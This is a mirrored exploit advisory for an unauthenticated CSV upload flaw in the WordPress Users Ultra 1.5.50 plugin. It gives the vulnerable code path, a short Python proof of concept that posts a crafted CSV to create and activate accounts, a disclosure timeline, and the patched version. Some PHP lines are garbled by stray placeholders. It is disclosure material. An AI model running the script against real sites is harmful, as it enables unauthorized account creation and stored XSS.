首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress Users Ultra 1.5.50 Unrestricted File Upload
来源:https://twitter.com/panVagenas 作者:panVagenas 发布时间:2015-11-18  
* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps

Description
================================================================================

WordPress plugin `Users Ultra Plugin` suffers for an unrestricted file upload vulnerability.

Any user (registered or not) can exploit a misbehavior of the plugin in order to upload csv files to the infected website. Although the plugin checks file extension using an extensions white-list (in this case only csv files are white-listed), no other checks (mime, size etc) are taking place. This alone can expose the infected website to a variety of attacks, please see [OWASP Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) to get an idea.

Details
================================================================================

The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:

1. Upon initialization of the plugin (anytime if it is activated) an instance of `XooUserUser` class is created
2. In the constructor of `XooUserUser` class a check for POST variable `uultra-form-cvs-form-conf` is taking place
    file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php` lines 19-23
    ```php
    if (isset(
___FCKpd___0
POST['uultra-form-cvs-form-conf'])) { /* Let's Update the Profile */ $this->process_cvs(
___FCKpd___0
FILES); } ``` 3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called. 4. `XooUserUser::process_cvs()` method process every file in
___FCKpd___0
FILES super-global by only making a check if the file has a `csv` extension In addition we mark the following points: 1. A malicious user can create and activate user accounts by exploiting this vulnerability if `
___FCKpd___0
POST["uultra-activate-account"]` is set to `active` 2. A welcome email is send if `
___FCKpd___0
POST["uultra-send-welcome-email"]` is set to 1 3. The csv files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone 4. Any additional columns present in the csv file are stored in `usermeta` 5. No sanitization for values in csv file can easily lead to a Persistent XSS attack, so an attacker can compromise the whole site PoC ================================================================================ The following Python3 script forms a csv file and uploads it to a site ```python3 #!/usr/bin/python3 import requests import csv import tempfile url = 'http://example.com/' postData = { 'uultra-form-cvs-form-conf': 1, 'uultra-send-welcome-email': 1, 'uultra-activate-account': 'pending' } csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country'] csvFileRow = ['userName', 'email@example.com', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO'] csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv') wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',') wr.writerow(csvFileHeader) wr.writerow(csvFileRow) csvFile.seek(0) files = {'file.csv': csvFile} r = requests.post(url, data=postData, files=files) exit(0) ``` Timeline ================================================================================ 2015/10/29 - Vendor notified via email 2015/11/11 - Vendor notified via contact form in his website 2015/11/13 - Vendor notified via support forums at wordpress.org 2015/11/14 - Vendor responded and received report through email 2015/11/15 - Vendor responded 2015/11/15 - Patch released Solution ================================================================================ Update to version 1.5.59

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Free WMA MP3 Converter 1.8 Buf
·vBulletin 5.x - Remote Code Ex
·TECO JN5 L510-DriveLink 1.482
·Audacious 3.7 - ID3 Local Cras
·TECO SG2 LAD Client 3.51 SEH O
·Joomla Content History SQLi Re
·foobar2000 1.3.9 - (.asx) Loca
·IBM i Access For Windows 7.1 B
·XCart 5.2.6 - Code Execution V
·F5 iControl iCall::Script Root
·ClipperCMS 1.3.0 - Code Execut
·SuperScan 4.1 Buffer Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved